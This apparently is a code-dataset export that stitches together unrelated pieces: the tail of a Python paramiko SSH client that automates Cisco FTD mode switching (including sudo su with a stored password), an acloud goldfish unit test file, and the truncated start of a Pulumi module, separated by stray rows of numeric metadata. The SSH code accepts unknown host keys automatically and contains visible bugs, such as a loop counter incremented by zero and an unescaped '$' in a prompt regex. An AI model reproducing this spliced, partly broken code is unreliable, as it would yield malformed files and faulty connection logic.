socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
time.sleep(self.wait_time)
break
else:
count += 1
time.sleep(self.wait_time)
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count += 0
time.sleep(self.wait_time)
try:
string = self.channel.recv(self.buffer).decode('UTF-8')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
if self.debug:
self.logger.debug(string)
if string:
if self.__password in string:
string = string.replace(self.__password, '*' * 20)
session_output += string
self.output += string
if re.search(expect_string, string, flags=re.IGNORECASE | re.MULTILINE):
self.prompt = session_output.splitlines()[-1]
return session_output
else:
count += 1
time.sleep(self.wait_time)
class SFTPClient:
def __init__(self):
self.__conn = None
self.channel = None
def connect(self, *args, **kwargs):
self.__conn = paramiko.SSHClient()
self.__conn.load_system_host_keys()
self.__conn.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
self.__conn.connect(*args, **kwargs)
except (paramiko.ssh_exception.AuthenticationException,
paramiko.ssh_exception.PartialAuthentication,
paramiko.ssh_exception.BadAuthenticationType,
paramiko.ssh_exception.PasswordRequiredException,
paramiko.ssh_exception.BadHostKeyException) as e:
self.disconnect()
raise DevmikoAuthenticationException(e)
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
self.channel = self.__conn.open_sftp()
def disconnect(self):
if self.channel:
self.channel.close()
if self.__conn:
self.__conn.close()
def get_with_progressbar(self, remote_file=None, local_file=None):
with TqdmWrap(ascii=True, unit='b', unit_scale=True) as progressbar:
self.channel.get(remote_file, local_file, callback=progressbar.view_progressbar)
def put_with_progressbar(self, local_file=None, remote_file=None):
with TqdmWrap(ascii=True, unit='b', unit_scale=True) as progressbar:
self.channel.put(local_file, remote_file, callback=progressbar.view_progressbar)
class FTDClient:
def __init__(self, debug=False, filename=None, level='DEBUG'):
self.__conn = None
self.channel = None
self.output = ''
self.default_string = r'(?:\$[\s]?)|(?:>[\s]?)|(?:#[\s]?)$'
self.wait_time = 0.2
self.buffer = 1024
self.max_iterations = 100
self.__password = ''
self.logger = None
self.debug = debug
self.system_hostname = None
self.regular_mode = True
self.diagnostic_cli_mode = False
self.clish_mode = False
self.lina_mode = False
self.expert_mode = False
self.prompt = None
if debug:
self.logger = set_debug(filename, level)
def connect(self, *args, **kwargs):
self.__password = kwargs.get('password', '')
expect_string = kwargs.get('expect_string', self.default_string)
self.__conn = paramiko.SSHClient()
self.__conn.load_system_host_keys()
self.__conn.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
self.__conn.connect(*args, **kwargs)
self.channel = self.__conn.invoke_shell(width=160, height=2048)
self.channel.settimeout(5.0)
except (paramiko.ssh_exception.AuthenticationException,
paramiko.ssh_exception.PartialAuthentication,
paramiko.ssh_exception.BadAuthenticationType,
paramiko.ssh_exception.PasswordRequiredException,
paramiko.ssh_exception.BadHostKeyException) as e:
self.disconnect()
raise DevmikoAuthenticationException(e)
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count = 0
time.sleep(self.wait_time)
self.output += self.channel.recv(self.buffer).decode('UTF-8')
if re.search(expect_string, self.output, flags=re.IGNORECASE | re.MULTILINE):
break
else:
count += 1
time.sleep(self.wait_time)
def disconnect(self):
if self.channel:
self.channel.close()
if self.__conn:
self.__conn.close()
def send_command(self, command='', expect_string=''):
expect_string = self.default_string if not expect_string else expect_string
count = 0
session_output = ''
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.send_ready():
try:
self.channel.sendall(f'{command}\n')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
time.sleep(self.wait_time)
break
else:
count += 1
time.sleep(self.wait_time)
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count += 0
time.sleep(self.wait_time)
try:
string = self.channel.recv(self.buffer).decode('UTF-8')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
if self.debug:
self.logger.debug(string)
if string:
if self.__password in string:
string = string.replace(self.__password, '*' * 20)
session_output += string
self.output += string
if re.search(expect_string, string, flags=re.IGNORECASE | re.MULTILINE):
self.prompt = session_output.splitlines()[-1]
return session_output
else:
count += 1
time.sleep(self.wait_time)
def __enter_diagnostic_cli(self):
output = self.send_command(command='system support diagnostic-cli')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
def __enter_expert(self):
output = self.send_command(command='expert')
if re.search(r'(?:$[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='sudo su', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command=self.__password)
def __enter_clish(self):
output = self.send_command(command='expert')
if re.search(r'(?:$[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='sudo su', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command=self.__password)
self.send_command(command='clish')
def __enter_lina(self):
output = self.send_command(command='expert')
if re.search(r'(?:$[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='sudo su', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command=self.__password)
output = self.send_command(command='sfconsole')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
def __exit_expert_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
def __exit_lina_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='exit')
def __exit_diagnostic_cli_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
def __exit_clish_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='exit')
def enter_regular_mode(self):
if self.regular_mode:
pass
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
elif self.lina_mode:
self.__exit_lina_mode()
elif self.expert_mode:
self.__exit_expert_mode()
elif self.clish_mode:
self.__exit_clish_mode()
self.regular_mode = True
self.diagnostic_cli_mode = False
self.lina_mode = False
self.expert_mode = False
self.clish_mode = False
def enter_diagnostic_cli_mode(self):
if self.regular_mode:
self.__enter_diagnostic_cli()
elif self.diagnostic_cli_mode:
pass
elif self.lina_mode:
self.__exit_lina_mode()
self.__enter_diagnostic_cli()
elif self.expert_mode:
self.__exit_expert_mode()
self.__enter_diagnostic_cli()
elif self.clish_mode:
self.__exit_clish_mode()
self.__enter_diagnostic_cli()
self.regular_mode = False
self.diagnostic_cli_mode = True
self.lina_mode = False
self.expert_mode = False
self.clish_mode = False
def enter_lina_mode(self):
if self.regular_mode:
self.__enter_lina()
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
self.__enter_lina()
elif self.lina_mode:
pass
elif self.expert_mode:
output = self.send_command(command='sfconsole')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
elif self.clish_mode:
self.send_command(command='exit')
output = self.send_command(command='sfconsole')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
self.regular_mode = False
self.diagnostic_cli_mode = False
self.lina_mode = True
self.expert_mode = False
self.clish_mode = False
def enter_expert_mode(self):
if self.regular_mode:
self.__enter_expert()
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
self.__enter_expert()
elif self.lina_mode:
self.send_command(command='exit')
self.send_command(command='exit')
elif self.expert_mode:
pass
elif self.clish_mode:
self.send_command(command='exit')
self.regular_mode = False
self.diagnostic_cli_mode = False
self.lina_mode = False
self.expert_mode = True
self.clish_mode = False
def enter_clish_mode(self):
if self.regular_mode:
self.__enter_clish()
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
self.__enter_clish()
elif self.lina_mode:
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='clish')
elif self.expert_mode:
self.send_command(command='clish')
elif self.clish_mode:
pass
self.regular_mode = False
self.diagnostic_cli_mode = False
self.lina_mode = False
self.expert_mode = False
self.clish_mode = True
| 38.772388
| 107
| 0.578048
| 2,121
| 20,782
| 5.437058
| 0.083451
| 0.05437
| 0.098855
| 0.085848
| 0.905914
| 0.891953
| 0.876604
| 0.866805
| 0.839664
| 0.825702
| 0
| 0.004674
| 0.320566
| 20,782
| 535
| 108
| 38.84486
| 0.81204
| 0
| 0
| 0.880694
| 0
| 0
| 0.050524
| 0.012703
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060738
| false
| 0.045553
| 0.017354
| 0
| 0.097614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e71a934d3f5bcf1432630e5adda8570805eb63f
| 18,528
|
py
|
Python
|
public/actions/create_goldfish_action_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
public/actions/create_goldfish_action_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
public/actions/create_goldfish_action_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2018 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for acloud.public.actions.create_goldfish_actions."""
import uuid
import unittest
from unittest import mock
from acloud.internal import constants
from acloud.internal.lib import android_build_client
from acloud.internal.lib import android_compute_client
from acloud.internal.lib import auth
from acloud.internal.lib import driver_test_lib
from acloud.internal.lib import goldfish_compute_client
from acloud.internal.lib import ssh
from acloud.public.actions import create_goldfish_action
class CreateGoldfishActionTest(driver_test_lib.BaseDriverTest):
"""Tests create_goldfish_action."""
IP = ssh.IP(external="127.0.0.1", internal="10.0.0.1")
INSTANCE = "fake-instance"
IMAGE = "fake-image"
BUILD_TARGET = "fake-build-target"
EMULATOR_BUILD_TARGET = "emu-fake-target"
BUILD_ID = "12345"
EMULATOR_BUILD_ID = "1234567"
GPU = "nvidia-tesla-k80"
BRANCH = "fake-branch"
EMULATOR_BRANCH = "emu-fake-branch"
KERNEL_BRANCH = "fake-kernel-branch"
KERNEL_BUILD_ID = "54321"
KERNEL_BUILD_TARGET = "kernel"
GOLDFISH_HOST_IMAGE_NAME = "fake-stable-host-image-name"
GOLDFISH_HOST_IMAGE_PROJECT = "fake-stable-host-image-project"
EXTRA_DATA_DISK_GB = 4
EXTRA_SCOPES = None
LAUNCH_ARGS = "fake-args"
def setUp(self):
"""Sets up the test."""
super(CreateGoldfishActionTest, self).setUp()
self.build_client = mock.MagicMock()
self.Patch(
android_build_client,
"AndroidBuildClient",
return_value=self.build_client)
self.compute_client = mock.MagicMock()
self.Patch(
goldfish_compute_client,
"GoldfishComputeClient",
return_value=self.compute_client)
self.Patch(
android_compute_client,
"AndroidComputeClient",
return_value=self.compute_client)
self.Patch(auth, "CreateCredentials", return_value=mock.MagicMock())
#Initialize new avd_spec
self.avd_spec = mock.MagicMock()
self.avd_spec.cfg = self._CreateCfg()
self.avd_spec.remote_image = {constants.BUILD_ID: self.BUILD_ID,
constants.BUILD_BRANCH: self.BRANCH,
constants.BUILD_TARGET: self.BUILD_TARGET}
self.avd_spec.emulator_build_id = self.EMULATOR_BUILD_ID
self.avd_spec.gpu = self.GPU
self.avd_spec.serial_log_file = None
self.avd_spec.autoconnect = False
def _CreateCfg(self):
"""A helper method that creates a mock configuration object."""
cfg = mock.MagicMock()
cfg.service_account_name = "fake@service.com"
cfg.service_account_private_key_path = "/fake/path/to/key"
cfg.zone = "fake_zone"
cfg.ssh_private_key_path = ""
cfg.ssh_public_key_path = ""
cfg.stable_goldfish_host_image_name = self.GOLDFISH_HOST_IMAGE_NAME
cfg.stable_goldfish_host_image_project = self.GOLDFISH_HOST_IMAGE_PROJECT
cfg.emulator_build_target = self.EMULATOR_BUILD_TARGET
cfg.extra_data_disk_size_gb = self.EXTRA_DATA_DISK_GB
cfg.extra_scopes = self.EXTRA_SCOPES
cfg.launch_args = self.LAUNCH_ARGS
return cfg
def testCreateDevices(self):
"""Tests CreateDevices."""
cfg = self._CreateCfg()
# Mock uuid
fake_uuid = mock.MagicMock(hex="1234")
self.Patch(uuid, "uuid4", return_value=fake_uuid)
# Mock compute client methods
self.compute_client.GetInstanceIP.return_value = self.IP
self.compute_client.GenerateImageName.return_value = self.IMAGE
self.compute_client.GenerateInstanceName.return_value = self.INSTANCE
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
none_avd_spec = None
# Call CreateDevices with avd_spec is None
report = create_goldfish_action.CreateDevices(
none_avd_spec, cfg, build_target=self.BUILD_TARGET,
build_id=self.BUILD_ID, emulator_build_id=self.EMULATOR_BUILD_ID,
gpu=self.GPU,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=none_avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
self.assertEqual(report.data, {
"devices": [
{
"instance_name": self.INSTANCE,
"ip": self.IP.external,
"branch": self.BRANCH,
"build_id": self.BUILD_ID,
"build_target": self.BUILD_TARGET,
"emulator_branch": self.EMULATOR_BRANCH,
"emulator_build_id": self.EMULATOR_BUILD_ID,
"emulator_build_target": self.EMULATOR_BUILD_TARGET,
"kernel_branch": self.KERNEL_BRANCH,
"kernel_build_id": self.KERNEL_BUILD_ID,
"kernel_build_target": self.KERNEL_BUILD_TARGET,
},
],
})
self.assertEqual(report.command, "create_gf")
self.assertEqual(report.status, "SUCCESS")
# Call CreateDevices with avd_spec
self.build_client.GetBranch.side_effect = [
self.BRANCH, self.EMULATOR_BRANCH
]
# TODO: Break out avd spec testing into its own testcase.
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
report = create_goldfish_action.CreateDevices(avd_spec=self.avd_spec)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=self.avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
def testCreateDevicesWithoutBuildId(self):
"""Test CreateDevices when emulator sysimage buildid is not provided."""
cfg = self._CreateCfg()
# Mock uuid
fake_uuid = mock.MagicMock(hex="1234")
self.Patch(uuid, "uuid4", return_value=fake_uuid)
# Mock compute client methods
self.compute_client.GetInstanceIP.return_value = self.IP
self.compute_client.GenerateImageName.return_value = self.IMAGE
self.compute_client.GenerateInstanceName.return_value = self.INSTANCE
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
# Mock _FetchBuildIdFromFile method
self.Patch(
create_goldfish_action,
"_FetchBuildIdFromFile",
return_value=self.BUILD_ID)
none_avd_spec = None
# Call CreateDevices with no avd_spec
report = create_goldfish_action.CreateDevices(
none_avd_spec,
cfg,
build_target=self.BUILD_TARGET,
build_id=None,
emulator_build_id=self.EMULATOR_BUILD_ID,
emulator_branch=None,
gpu=self.GPU,
branch=None,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=none_avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
self.assertEqual(report.data, {
"devices": [{
"instance_name": self.INSTANCE,
"ip": self.IP.external,
"branch": self.BRANCH,
"build_id": self.BUILD_ID,
"build_target": self.BUILD_TARGET,
"emulator_branch": self.EMULATOR_BRANCH,
"emulator_build_id": self.EMULATOR_BUILD_ID,
"emulator_build_target": self.EMULATOR_BUILD_TARGET,
"kernel_branch": self.KERNEL_BRANCH,
"kernel_build_id": self.KERNEL_BUILD_ID,
"kernel_build_target": self.KERNEL_BUILD_TARGET,
},],
})
self.assertEqual(report.command, "create_gf")
self.assertEqual(report.status, "SUCCESS")
# Call CreateDevices with avd_spec
self.build_client.GetBranch.side_effect = [
self.BRANCH, self.EMULATOR_BRANCH
]
# TODO: Break out avd spec testing into its own testcase.
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
report = create_goldfish_action.CreateDevices(avd_spec=self.avd_spec)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=self.avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
#pylint: disable=invalid-name
def testCreateDevicesWithoutEmulatorBuildId(self):
"""Test CreateDevices when emulator build id is not provided."""
cfg = self._CreateCfg()
# Mock uuid
fake_uuid = mock.MagicMock(hex="1234")
self.Patch(uuid, "uuid4", return_value=fake_uuid)
# Mock compute client methods
self.compute_client.GetInstanceIP.return_value = self.IP
self.compute_client.GenerateImageName.return_value = self.IMAGE
self.compute_client.GenerateInstanceName.return_value = self.INSTANCE
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
# Mock _FetchBuildIdFromFile method
self.Patch(
create_goldfish_action,
"_FetchBuildIdFromFile",
return_value=self.EMULATOR_BUILD_ID)
none_avd_spec = None
# Call CreateDevices
report = create_goldfish_action.CreateDevices(
none_avd_spec, cfg, build_target=self.BUILD_TARGET,
build_id=self.BUILD_ID, emulator_build_id=None,
gpu=self.GPU)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=none_avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
self.assertEqual(report.data, {
"devices": [{
"instance_name": self.INSTANCE,
"ip": self.IP.external,
"branch": self.BRANCH,
"build_id": self.BUILD_ID,
"build_target": self.BUILD_TARGET,
"emulator_branch": self.EMULATOR_BRANCH,
"emulator_build_id": self.EMULATOR_BUILD_ID,
"emulator_build_target": self.EMULATOR_BUILD_TARGET,
"kernel_branch": self.KERNEL_BRANCH,
"kernel_build_id": self.KERNEL_BUILD_ID,
"kernel_build_target": self.KERNEL_BUILD_TARGET,
},],
})
self.assertEqual(report.command, "create_gf")
self.assertEqual(report.status, "SUCCESS")
# Call CreateDevices with avd_spec
self.build_client.GetBranch.side_effect = [
self.BRANCH, self.EMULATOR_BRANCH
]
# TODO: Break out avd spec testing into its own testcase.
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
report = create_goldfish_action.CreateDevices(avd_spec=self.avd_spec)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=self.avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
if __name__ == "__main__":
unittest.main()
| 41.449664
| 81
| 0.643405
| 2,117
| 18,528
| 5.290978
| 0.101559
| 0.059995
| 0.053031
| 0.032229
| 0.808231
| 0.775556
| 0.768592
| 0.736184
| 0.725471
| 0.722525
| 0
| 0.004043
| 0.279145
| 18,528
| 446
| 82
| 41.542601
| 0.834606
| 0.091159
| 0
| 0.754237
| 0
| 0
| 0.054183
| 0.01092
| 0
| 0
| 0
| 0.002242
| 0.042373
| 1
| 0.014124
| false
| 0
| 0.031073
| 0
| 0.101695
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e8998e08fb03a77ca3cba64ad0f4cfe22e99a37
| 27,175
|
py
|
Python
|
sdk/python/pulumi_oci/artifacts/container_repository.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/artifacts/container_repository.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/artifacts/container_repository.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ContainerRepositoryArgs', 'ContainerRepository']
@pulumi.input_type
